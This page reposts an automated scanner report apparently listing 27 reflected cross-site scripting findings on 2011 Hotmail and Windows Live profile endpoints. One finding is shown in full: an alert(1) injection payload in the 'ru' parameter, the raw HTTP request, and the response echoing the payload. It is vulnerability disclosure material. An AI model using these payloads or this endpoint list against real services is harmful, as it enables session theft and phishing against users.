HotMail, Pishing, Identity Theft, XSS, Cross Site Scripting in MSFT Mail HTTP Systems

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://cid-6960b47ef00cd343.profile.live.com/details/ [ru parameter]

1.2. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [appoption_1 parameter]

1.3. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [appoption_2 parameter]

1.4. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [appoption_4 parameter]

1.5. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [appoption_5 parameter]

1.6. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [appoption_6 parameter]

1.7. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [cancel parameter]

1.8. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [name of an arbitrarily supplied request parameter]

XSS in profile.live.com, XSS, HOTMAIL, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.9. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [nextpage parameter]

1.10. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [oauth_problem parameter]

1.11. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [psaflowid parameter]

1.12. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [ru parameter]

1.13. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [ru parameter]

1.14. http://cid-9c9838e8e958effe.profile.live.com/Services/Add.aspx [token parameter]

1.15. http://cid-9c9838e8e958effe.profile.live.com/details/ [ru parameter]

1.16. http://cid-9c9838e8e958effe.profile.live.com/details/Add/ [ru parameter]

1.17. http://co102w.col102.mail.live.com/mail/AccountList.aspx [MH cookie]

XSS in profile.live.com, XSS, HOTMAIL, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.18. http://co102w.col102.mail.live.com/mail/AddFolderLight.aspx [MH cookie]

1.19. http://co102w.col102.mail.live.com/mail/ContactMainLight.aspx [MH cookie]

1.20. http://co102w.col102.mail.live.com/mail/EditMessageLight.aspx [MH cookie]

1.21. http://co102w.col102.mail.live.com/mail/EditMessageLight.aspx [MH cookie]

1.22. http://co102w.col102.mail.live.com/mail/HomeOptions.aspx [MH cookie]

1.23. http://co102w.col102.mail.live.com/mail/InboxLight.aspx [MH cookie]

1.24. http://co102w.col102.mail.live.com/mail/ManageFoldersLight.aspx [MH cookie]

1.25. http://co102w.col102.mail.live.com/mail/ManageGroupsLight.aspx [MH cookie]

1.26. http://co102w.col102.mail.live.com/mail/VacationReply.aspx [MH cookie]

1.27. http://co102w.col102.mail.live.com/mail/options.aspx [MH cookie]



1. Cross-site scripting (reflected)
There are 27 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://cid-6960b47ef00cd343.profile.live.com/details/ [ru parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cid-6960b47ef00cd343.profile.live.com
Path:   /details/

Issue detail

The value of the ru request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2557e'%3balert(1)//ad55bbd00c2 was submitted in the ru parameter. This input was echoed as 2557e';alert(1)//ad55bbd00c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /details/?ru=http%3a%2f%2fco102w.col102.mail.live.com%2fmail%2fContactMainLight.aspx%3fn%3d378362732557e'%3balert(1)//ad55bbd00c2 HTTP/1.1
Host: cid-6960b47ef00cd343.profile.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Imf: 021904b0-7e2c-4cbf-8ff4-41473e9f6cf7
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
Set-Cookie: mktstate=S=237173173&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=ui=en-us&marketing=en-us; domain=.profile.live.com; path=/
Set-Cookie: E=P:7vrKOwqVzYg=:xHyMdKq9JOW8noeAffBqLAzXJ+mtqLYRNZ9MNwxBiFg=:F; domain=.live.com; path=/
Set-Cookie: xid=9e627d2f-7eba-45bb-8d7e-b7c700d62bb0&&BL2xxxxxC622&71; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Mon, 07-Feb-2011 16:36:11 GMT; path=/
Set-Cookie: wla42=Ymx1MSoxLDY5NjBCNDdFRjAwQ0QzNDMsMCw=; domain=live.com; expires=Mon, 14-Feb-2011 18:16:11 GMT; path=/
Set-Cookie: wlv=A|UHeK-t:a*_; domain=.live.com; path=/
Set-Cookie: mcid=; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: sc=TB/wL1ZL2CP5LpM+WDO58x7LcQHOcQK5wGaPh7hKHjo=3; domain=profile.live.com; path=/
Set-Cookie: sc_lpscache_142=1pwFeFmZBRqL51OmpIehGvJX4DASonuRzPqTW2rkQiB0CtOU5DWmoLeQ; domain=cid-6960b47ef00cd343.profile.live.com; path=/
Set-Cookie: sc_clustbl_142=437dd6f25abd2f9a2:cO5bnzEnOg36Y8jp62z+rewU/0wdS1mEAOqH+PYNYv0=; domain=profile.live.com; expires=Wed, 09-Mar-2011 18:16:11 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC622 V: 1 D: 1/28/2011
Date: Mon, 07 Feb 2011 18:16:10 GMT
Connection: close
Content-Length: 45319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">//<![CDATA[
window["$BSI"]={headTime:(new Date).getTime()};window["$CSIPerf"]={lapse:[{},{s:"h",t:$BSI.headTime}],csd:{},_ttg:$BSI.headTime}
//]]></script>
<link rel="StyleSheet" href="http://css.wlxrs.com/HGjlAVvMlW6-1!iEEpuBkgo2TZKpU8RH1wdoo5rx6p3x-sVokzTifn4kt2LqQTjuq-nexqk1fr3mZ3SQtqscWud7R41QryMvs57TghM7Qc3mY37L6whfQQ/Base/15.40.1211/NYKpPzcj59cProfile.css?ZfDHJ0dwkwrfIMoja3-R7w" type="text/css"/><style id="themecss" type="text/css">.t_sel{background-color:#DDECFE;border:1px solid #83AADA;}.t_seli{background-color:#DDECFE !important;border:1px solid #83AADA !important;}.t_hov{background-color:#F3F7FD;border:1px solid #BBD8FB;}.t_hovl a:hover{background-color:#F3F7FD;border:1px solid #BBD8FB;}.t_hovl a.sel{background-color:#DDECFE;border:1px solid #83AADA;}.t_hdt,h1,.t_hdt a,.t_hdt a:visited,.t_hdt a:hover,.t_hdt a:link{color:#000;}.t_hdst,.t_hdt .c_hp li .link{color:#555;}.t_hp{border-left:1px solid #555;border-right:1px solid #555;}.t_hdbg{background-color:#d6eef8;}h2,h2 a,h2 a:visited,h3,h3 a,h3 a:visited,h4,h5,h6,.t_cht{color:#006E12 !important;}.t_hdbg{background-color:#d6eef8;}a,a:hover,.t_lnk a,.t_lnk a:link,.t_lnk a:hover,.t_elnk{color:#0066CC;}a:visited,.t_lnk a:visited{color:#0066CC;}.t_hdbgimg{background-image:url(http://css.wlxrs.com/HGjlAVvMlW6-1!iEEpuBkgo2TZKpU8RH1wdoo5rx6p3x-sVokzTifn4kt2LqQTjuq-nexqk1fr3mZ3SQtqscWud7R41QryMvs57TghM7Qc3mY37L6whfQQ/base/15.40.1211/img/default_final_ltr.jpg);background-repeat:repeat-x;background-position:center 0px;}</style><script type="text/javascript">//<![CDATA[
if(!window["$Do"]){$Do={};$Do.q=[]}new function(){var a=$Do;a.iff=function(c,b){return a.c?a.c(c,b,arguments):0};a.when=function(c,b){if(!a.iff.apply(a,arguments))a.q.push({id:c,c:b,a:arguments})}}
//]]></script>
<title>Details - Windows Live</title>
<meta http-equiv="Content-Type" content="text/html&#59;charset&#61;utf-8"/>
<link rel="shortcut icon" href="http&#58;//img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/wl_profile_favicon.ico" type="image/x-icon" />


<script type="text/javascript">var _d=document,_dh=_d.getElementsByTagName("head")[0];function $(a){return _d.getElementById(a)};function $newScript(e,f,b,d){var a=_d.createElement("script");a.id=f||"";if(d)a.async=true;a.src=e;if(!b){var c=$("head")||_dh;c.appendChild(a)}return a};$newScript('http://js.wlxrs.com/gsFN2MaCGSnDwH5gRXEFxQ/liteframework.js','',1);var $SM=[];new function(){var a=['http\x3a\x2f\x2fmsc.wlxrs.com\x2fsdeecqP9ZZxWiQxEpdWJFg\x2fWeb\x2fscript\x2fwebfoundation.js', 'http\x3a\x2f\x2fjs.wlxrs.com\x2fyp7W9xUuIPXv6swFMFOIvA\x2fSearchBox.js', 'http\x3a\x2f\x2fads1.msn.com\x2flibrary\x2fdap.js', 'http\x3a\x2f\x2fmsc.wlxrs.com\x2fsdeecqP9ZZxWiQxEpdWJFg\x2fWeb\x2fscript\x2fcontactdetailsvisitorview.js'],i,b=a.length;for(i=0;i<b;i++){$SM.push($newScript(a[i],'',1));}}</script>
<script type="text/javascript">//<![CDATA[

//]]></script>





<script type="text/javascript">

var C_STATIC_CONTENT_URL = 'http\x3a\x2f\x2fmsc.wlxrs.com\x2fsdeecqP9ZZxWiQxEpdWJFg\x2f';
var C_STATIC_IMAGES_URL = 'http\x3a\x2f\x2fimg.wlxrs.com\x2fNTGgALEIJjnFbKo38G-GGA\x2f';
var C_VERSION = '15.4.6813.0128';

</script>

<meta name="PageId" content="ContactDetails" />


<base href="http&#58;//cid-6960b47ef00cd343.profile.live.com/" />






</head>
<body class="ltr SignedOut IE IE_Win Win6 IE_M7 IE_D0 Full RE_Trident" id="Contact.default.F.U"><script type="text/javascript">//<![CDATA[
$CSIPerf._ttg=(new Date).getTime();$CSIPerf.lapse.push({s:"bc",t:$CSIPerf._ttg})
//]]></script>



<div id="m_wh"><script type="text/javascript">//<![CDATA[
function $MB(b,d,g,f,e){if(!window.$f)return;b=b||event;var h=b.target||b.srcElement,a=$f.pn(h,"c_ml");if(a&&!a.menu){var c=$(a.getAttribute("hid"));if(c){$css.add(c,"uxfa_m c_m t_hovl");a.parentNode.insertBefore(c.cloneNode(true),a.nextSibling)}}try{$menu.bind(b,g,f,1,0,0,undefined,e)}catch(i){}if(d)$Do.when("$WLXIMCL.initialize",0,0)}function $SP(a){$WLXIM.switchPresence(a);$menu.closeCurrent()}function $MeMenu(b,a){$MB(b,0,a,0,750);$Do.when("$ThemeMenuInit")}
//]]></script><script type="text/javascript">//<![CDATA[
var $B={'ltr':1,'SignedOut':1,'IE':1,'IE_Win':1,'Win6':1,'IE_M7':1,'IE_D0':1,'Full':1,'RE_Trident':1,V:7.0}
//]]></script><div id="c_header" class="c_hb t_hdbg" style="min-width:987px;"><div class="c_hta t_hdbgimg"><div class="c_hg" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/g.png);"><div class="c_h t_hdt" style="width:947px;"><div class="c_htr"><div class="c_hleft"><script type="text/javascript">//<![CDATA[
function uxp_imgClipClick(b){try{var a=event;if(typeof a.srcElement.src!="undefined")if(a.ctrlKey||a.shiftKey)window.open(b.href);else _d.location=b.href}catch(c){}return false}
//]]></script><div class="c_hl" style="top:12px;"><a class="c_hlp c_nootl uxfa_ml c_ml link c_hbrln" onclick="uxp_imgClipClick(this);" href="http&#58;//home.live.com/&#63;rru&#61;home&#38;livecom&#61;1" target="_top" onfocus="$MB(event,0,0,{x:21,y:0})" onmouseover="$MB(event,0,0,{x:21,y:0})"><span class="c_is" style="width:18px;height:17px;vertical-align:middle;margin-right:3px;"><span style="clip: rect(8px 18px 24px 0px);left:0px;top:-8px;"><img src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png" alt="Windows Live" /></span></span><span class='c_hbrnd'>Windows Live<span class="c_tm">&trade;</span></span></a><ul class="uxfa_m c_m t_hovl"><li><a href="http://home.live.com/?rru=home&livecom=1" target="_top">Home</a><span class="c_ms"></span></li><li><a href="https://devices.live.com/" target="_top">Devices</a></li><li><a href="http://skydrive.live.com/" target="_top">SkyDrive</a></li><li><a href="https://devices.live.com/Devices/Mobile" target="_top">Mobile</a></li><li><a href="http://g.live.com/9uxp9en-us/hdr_dwnld??su=http://shared.live.com/Live.Profile" target="_top">Downloads</a><span class="c_ms"></span></li><li><a href="http://home.live.com/allservices/" target="_top">All services</a></li></ul></div><ul class="c_ht"><li><a href="http://mail.live.com/?rru=inbox" class="uxfa_ml c_ml" target="_top" hid="c_ht_mail" onmouseover="&#36;MB&#40;event&#41;" onfocus="&#36;MB&#40;event&#41;">Hotmail<span id="c_murc"></span></a></li><li><a href="#" onclick="&#36;MB&#40;event,1&#41;&#59;return false" class="uxfa_ml c_ml" target="_top" hid="c_mm_clc0" onmouseover="&#36;MB&#40;event,1&#41;" onfocus="&#36;MB&#40;event,1&#41;">Messenger<span id="c_mocc"></span></a></li><li><a href="http://office.live.com/" class="uxfa_ml c_ml" target="_top" hid="c_ht_docs" onmouseover="&#36;MB&#40;event&#41;" onfocus="&#36;MB&#40;event&#41;">Office</a></li><li><a href="http://photos.live.com/" class="uxfa_ml c_ml" target="_top" hid="c_ht_photos" onmouseover="&#36;MB&#40;event&#41;" onfocus="&#36;MB&#40;event&#41;">Photos</a><span class="c_ms t_hp"></span></li><li><a href="http://g.live.com/9uxp9msn/mhm-en-us??su=http://shared.live.com/Live.Profile" class="uxfa_ml c_ml" target="_top" hid="c_ht_msn" onmouseover="&#36;MB&#40;event&#41;" onfocus="&#36;MB&#40;event&#41;">MSN</a></li></ul></div><div class="c_hright"><div id="c_me" class="c_me c_mcp" thov="1"><a id="c_signin" href="https&#58;//login.live.com/login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1297102571&#38;rver&#61;6.1.6206.0&#38;wp&#61;MBI&#38;wreply&#61;http&#58;&#37;2F&#37;2Fcid-6960b47ef00cd343.profile.live.com&#37;2Fdetails&#37;2F&#37;3Fru&#37;3Dhttp&#37;253a&#37;252f&#37;252fco102w.col102.mail.live.com&#37;252fmail&#37;252fContactMainLight.aspx&#37;253fn&#37;253d378362732557e&#37;27&#37;253balert&#40;1&#41;&#37;2F&#37;2Fad55bbd00c2&#38;lc&#61;1033&#38;id&#61;73625&#38;mkt&#61;en-US" class="signIn TextSizeLarge" target="_top">Sign in</a></div></div></div><div class="c_hp">
<div class="sn_sm">
<div class="sn_sm_ic">
<script type="text/javascript">//<![CDATA[
$icerrsrc = "http\x3a\x2f\x2fsecure.wlxrs.com\x2f\x24live.controls.images\x2fic\x2fbluemann.png";function ic_onTE(a){try{var c=a.getAttribute("errsrc")||$icerrsrc;if(a.src!=c){a.className="c_ic_tile";var b=a.style;b.top=b.left=b.height=b.width="";setTimeout(function(){a.src=c;a.style.visibility=""},0)}}catch(d){}}function ic_onTL(a){try{var c=a.width,b=a.height;a.className="c_ic_tile";var j=a.width,i=a.height,e,d,l=0,m=0;if(c==0&&b==0){var k=new Image;k.src=a.src;c=k.width;b=k.height}var h=a.currentStyle;if(c==1&&b==1||h&&h.width=="1px"&&h.height=="1px"){ic_onTE(a);return}var g=Math.round;if(c&&b&&c!=b){if(c>b){d=i;e=g(i*(c/b));l=-g((e-j)/2)}else{e=j;d=g(j*(b/c));m=-g((d-i)/2)}var f=a.style;if(d&&e){f.width=e+"px";f.height=d+"px";f.left=l+"px";f.top=m+"px"}}a.style.visibility=""}catch(n){}};
//]]></script><div id="ic2" class="c_ic c_ic_h_xl"><div class="c_ic_img_h c_ic_img_xl"><div class="c_ic_img_sub c_ic_img_xl" id="ic2_usertilecontainer"><a id="ic2_frame_clip" title="Picture of Someone on Windows Live" class="c_ic_frame_clip c_ml" target="_top" href="http&#58;//cid-6960b47ef00cd343.profile.live.com/" onclick=""><span class="is_c" id="ic2_frame"><img class="is_img c_ic_blueframe" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/ic/iciconmapxl24w4.png);" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt=""/></span></a><div class="c_ic_tile_clip"><img id="ic2_usertile" errsrc="http://secure.wlxrs.com/$live.controls.images/ic/bluemannxl.png" src="http://secure.wlxrs.com/$live.controls.images/ic/bluemannxl.png" onload="ic_onTL(this)" onerror="ic_onTE(this)" style="visibility:hidden;" alt="Picture of Someone on Windows Live" /></div></div></div><div class="c_clr"></div></div>
</div>
<div class="sn_sm_cont t_hdt">
<div class="sn_sm_name">
<span id="ic3" class="c_ic_i"><span class="c_ic_name" id="ic3_name" title="Someone on Windows Live"><span dir='ltr'>Someone on Windows Live</span></span ></span>
</div>
<!------ SAC or PSM ------>


<!------ Profile region ------>


<!------ Relationship region ------>


</div>


<div style="clear: both; height: 1px;" />

</div>
<div class="c_clr"></div></div></div></div></div></div><script type="text/javascript">var $HIC={};$HIC.e=7;
$HIC.m=0;
$HIC.l=0;$HIC.NoWebIm=1;</script><script type="text/javascript">//<![CDATA[
var $HeaderCookie={};new function(){var c=$HeaderCookie,a=$("c_mocc"),b=$("c_murc"),f=$B.rtl?"&#x200f;":"";function d(b){if(a&&!$HIC.NoWebIm){a.style.display="inline";if(b>999)b="99+";a.innerHTML="&nbsp;"+f+"("+b+")"}$HIC.m=b;$Do.when("$Header.UpdateCookie",this)}c.updateContactsCount=d;function g(){if(this.dataIsGood&&$HIC.m)return $HIC.m;else return 0}c.getContactsCount=g;function e(a){if(b){b.style.display="inline";if(a>9999)a="999+";b.innerHTML="&nbsp;"+f+"("+a+")"}$HIC.l=a;$Do.when("$Header.UpdateCookie",this)}c.updateUnreadCount=e;if($HIC.m)d(parseInt($HIC.m));if($HIC.l)e(parseInt($HIC.l))}
//]]></script></div><div class="c_base c_fixwth">
<div id="c_content" class="c_main">

<div class="c_left_area" >
<div id="m_wn"><ul class="c_n t_hovl "><li><ul class="c_nlast"><li><a id="sn_pp_ln_pr" href="http&#58;//cid-6960b47ef00cd343.profile.live.com/" title="View profile">Profile</a></li><li><a id="sn_pp_ln_detl" href="http&#58;//cid-6960b47ef00cd343.profile.live.com/details" class="sel" title="View details">Details</a></li><li><a id="sn_pp_ln_foto" href="http&#58;//cid-6960b47ef00cd343.photos.live.com/albums.aspx" title="View photos being shared with you">Photos</a></li><li><a id="sn_pp_ln_tagfoto" href="http&#58;//cid-6960b47ef00cd343.photos.live.com/peopletags.aspx" title="View photos of this person">Photos of this person</a></li><li><a id="sn_pp_ln_file" href="http&#58;//cid-6960b47ef00cd343.office.live.com/documents.aspx" title="View documents being shared with you">Documents</a></li></ul></li></ul></div>
<div id="m_wcrm">
<span class="adsupressiondetail" style="display:none;"></span>
</div>




<div class="std_LeftNav_PaddingTop">

</div>


<div class="std_LeftNav_PaddingTop">


</div>






<div class="std_LeftNav_PaddingTop">

<div style="width:120px;" >
<div id="Crm120x60_0_p" style="width:120px;height:60px;">
<div id="Crm120x60_0" style="overflow:hidden;width:120px;height:60px;" name="Advertisement" >

</div>
</div>
</div>

</div>

</div><div class="c_landmain m_colL">
<div class="c_middle_area">
<div id="m_wc" class="c_cb_area" ><div class="c_c c_cbb c_ccptc" id="CommandBar1"><ul class="c_cc"><li><a id="sn_pp_cb_cnct" href="&#35;" onclick="try&#123;sn_frInvite.show&#40;&#39;m0&#39;,0,function&#40;r&#41;&#123;if&#40;r.hasSucceeded&#41;&#123;location.reload&#40;&#41;&#125;&#125;&#41;&#125;catch&#40;e&#41;&#123;&#125; return false&#59;">Add as a friend</a></li><li class="c_mcp"><a href="&#35;" onclick="try&#123;&#36;menu.bind&#40;event,6,0,1,0,0,0&#41;&#59;&#125;catch&#40;e&#41;&#123;&#125;&#59;return false" class=" uxfa_ml c_ml"><span class="c_mlu">More</span><span class="c_chev"> &#9660;</span></a><ul class=" uxfa_m c_m t_hovl"><li><a href="&#35;" class="c_collRem">remove</a></li></ul></li></ul></div><script type="text/javascript">new function(){var c_cb = document.getElementById("CommandBar1");c_cb.firstChild.lastChild.style.display = 'none';c_cb.m=100;c_cb.i=1;c_cb.s="inline";c_cb.r=1;}</script></div>
<div>



<div id="m_wd">

</div>
<div style="margin:20px 0px">

<script language="javascript" type="text/javascript">
var jsConfig = {
"IsRightToLeft":"false",
"IsUserInFavCategory":"false",
"CbLimitAccessId":"cbLimitAccess",
"CbAppearOfflineId":"cbAppearOffline",
"OkButtonText":"Yes",
"CancelButtonText":"No",
"CbRemoveAsFriendId":"cbRemoveFriend",
"CbDeleteContactId":"cbDelete",
"FavIconId":"fav",
"UnlinkContactPopoverHeader":"Are you shure you want to separate this contact\u0026\u002363\u003b",
"UnlinkContactPopoverBody":"\u003cdiv\u003eThe info for this contact was combined from two or more contacts.\u003c\u002fdiv\u003e\u003cbr\u002f\u003e\u003cdiv\u003eBy separating this contact, a new contact will be created for this person using this info you selected.\u003c\u002fdiv\u003e",
"RemoveAsFriendPopoverHeader":"\u0026\u002391\u003bstring not found \u0026\u002340\u003bProfile.Details.RemoveAsFriendPopover.HeaderNoName\u0026\u002341\u003b\u0026\u002393\u003b",
"RemoveAsFriendPopoverBody":"\u003cdiv\u003eRemoving someone from your list of friends means you won\u0026\u002339\u003bt be able to see each other\u0026\u002339\u003bs social updates or send them instant messages.\u003c\u002fdiv\u003e",
"DelContactPopoverHeader":"Are you sure you want to delete this person from your contact list\u0026\u002363\u003b",
"DelContactPopoverBody":"\u003cdiv\u003eYou\u0026\u002339\u003bll delete this person from your contact list and from your list of friends.\u003c\u002fdiv\u003e\u003cbr \u002f\u003e\u003cdiv\u003eIf you imported this contact from another website, you\u0026\u00238217\u003bll also need to delete their information on that website to completely remove them from your contact list.\u003c\u002fdiv\u003e",
"StarFilledIcon":"http\u003a\u002f\u002fimg.wlxrs.com\u002fNTGgALEIJjnFbKo38G-GGA\u002fWeb\u002fimages\u002ffavorites_star_14x14.png",
"StarEmptyIcon":"http\u003a\u002f\u002fimg.wlxrs.com\u002fNTGgALEIJjnFbKo38G-GGA\u002fWeb\u002fimages\u002frating_stars_outline_14x14.png",
"AddToFavStr":"Add to favorite",
"RemoveFromFavStr":"Remove from favorite",
"FavGroupId":"00000000-0000-0000-0000-000000000000"};
var groupArray = new Array();
var m_unLinkContactId;

function RemoveAsFriendCb()
{

}

function DeleteCb()
{
window.location.href = 'http://cid-6960b47ef00cd343.profile.live.com/details/delete/?ru=http://co102w.col102.mail.live.com/mail/ContactMainLight.aspx%3fn%3d378362732557e';alert(1)//ad55bbd00c2';
}

function UpdateFavGroup()
{

}

function SeparateContact()
{

}
</script>

<div id="notification" class="UI_NotificationBar ErrorLow" style="display:none ">
</div>
<style type="text/css">
.cd_fav_star
{
cursor:pointer;
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/favorites_star_14x14.png);
background-position:center bottom;
}
.cd_fav_star_empty
{
cursor:pointer;
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/rating_stars_outline_14x14.png);
background-position:center bottom;
}
a.cd_fav_star:hover
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/rating_stars_outline_14x14.png);
}
a.cd_fav_star_empty:hover
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/favorites_star_14x14.png);
}
a.cd_fav_star:active
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/rating_stars_outline_14x14.png);
}
a.cd_fav_star_empty:active
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/favorites_star_14x14.png);
}
.cd_spc_fb
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/logo_facebook-16.gif);
}
.cd_spc_mspz
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/logo_myspace-16.gif);
}
.cd_spc_li
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/logo_linkedin-16.gif);
}
.cd_spc_wl
{
background-image:url(http://img.wlxrs.com/NTGgALEIJjnFbKo38G-GGA/Web/images/i_messenger_buddy.gif);
}
</style>
<table cellpadding="0" cellspacing="0" style="table-layout:fixed; width:100%">
<!-- Contact info section -->



<!-- Personal info section -->


<!-- Work and education info section -->


</table>

<form>
<input type="hidden" id="sc" name="sc" value="TB/wL1ZL2CP5LpM+WDO58x7LcQHOcQK5wGaPh7hKHjo=3" />
</form>

</div>
</div>
</div><div class="c_right_area">
<div id="m_wsb">
<script type="text/javascript">//<![CDATA[
if (!window['$SB'])
{
$SB =
{
sbs:{},
first:'c_search_SearchBoxControl_box',
consumer: 'Live.Profile',
formCode: 'WLPRFL'
};
}
$SB.SearchBox=function(u,g,w,s,p,h,c,t,x){var a=this,m=w,k=s,v=t,d=g?true:false,e=false,l=false,j="c_search_box c_ml",r=j+" c_search_a",q=j+" TextItalic",z=a.hasInitialQuery=g,o=a.formId=c+"f",b=a.searchBoxId=c+"box",n=a.submitId=c+"go",i=a.searchEmailFunc=h?function(b){var a=$SB["MailSearchHelper"],c=a?a.queryStartsWithKeyword(b):"";h(c?c+a.removeKeywords(b):b)}:null,A=a.renderMode=u;a.contactOverride=p;a.usesForm=x;a.statusId=c+"status";a.idPrefix=c;a.doSubmit=function(){var f=$(o),c=$(b),e=$(n);!d&&(c.value="");if(a.getValue().trim()==="")return false;if(k)try{return k(c,f,e,a)}catch(g){}if(i){i(a.getValue());return false}return true};a.focus=function(){var c=$(b);try{!l&&$BSI.reportEvent("search.general",{SearchMethod:"focus"});l=true}catch(f){}if(!d){$B.IE&&setTimeout(function(){e&&c.select()},1);c.defaultValue="";a.setValue("",true)}e=true};a.blur=function(){var c=$(b);c.value===""&&a.resetDefault(c);e=false};a.setValue=function(d,c){var a=$(b);a.value=d;c&&y(a)};a.getValue=function(){return d?$(b).value:""};a.submitForm=function(){$(n).click()};a.resetDefault=function(a){a=a||$(b);a.value=v;a.className=q;m&&f("url("+$SBC.bgImage+")");d=false};function f(a){$(o).style.backgroundImage=a}function y(a){a.className=r;m&&f("");d=true}};$SB.clearFirst=function(){$SB.sbs[$SB.first].setValue("",false)};$SB.queryFirst=function(){return $SB.sbs[$SB.first].getValue()};
$SB.sbs['c_search_SearchBoxControl_box'] = new $SB.SearchBox(
'OTHER',
false,
true,
0,
0,
0,
'c_search_SearchBoxControl_',
'Search contacts and more',
true
);
//]]></script>
<form id="c_search_SearchBoxControl_f" class="c_search_mc c_sb" action="http&#58;//home.live.com/search" method="get" target="_top" onsubmit="return &#36;SB.sbs&#91;&#39;c_search_SearchBoxControl_box&#39;&#93;.doSubmit&#40;&#41;&#59;" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/sb/bingLogo.png);" >
<label for="c_search_SearchBoxControl_box">
Search contacts and more
</label>
<input id="c_search_SearchBoxControl_box" class="c_search_box c_ml TextItalic" type="text" name="query" value="Search contacts and more" title="Search contacts and more" autocomplete="Off" maxlength="500" onfocus="&#36;SB.sbs&#91;&#39;c_search_SearchBoxControl_box&#39;&#93;.focus&#40;&#41;&#59;" onblur="&#36;SB.sbs&#91;&#39;c_search_SearchBoxControl_box&#39;&#93;.blur&#40;&#41;&#59;" />
<input title="Search" class="c_search_go" id="c_search_SearchBoxControl_go" type="submit" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/sb/bingSpyglass2.gif);" value="" />
<input type="hidden" name="mkt" value="en-US" />
<input type="hidden" name="scope" value="People" />
<input type="hidden" name="consumerid" value="Live.Profile" />

</form>

</div>



<div id="m_wa">
<div style="width:300px;" class="Ad300x250" >
<div id="Ad300x250_0_adchoice" style="display:none;text-align:right;">
<a target="_blank" href="http://g.live.com/9uxp9ad/choices-en-us"><img src="http://secure.wlxrs.com/$live.controls.images/ad/w4/adchoices.png" alt=""></img></a>
</div>
<div id="Ad300x250_0_p" style="width:300px;height:250px;">
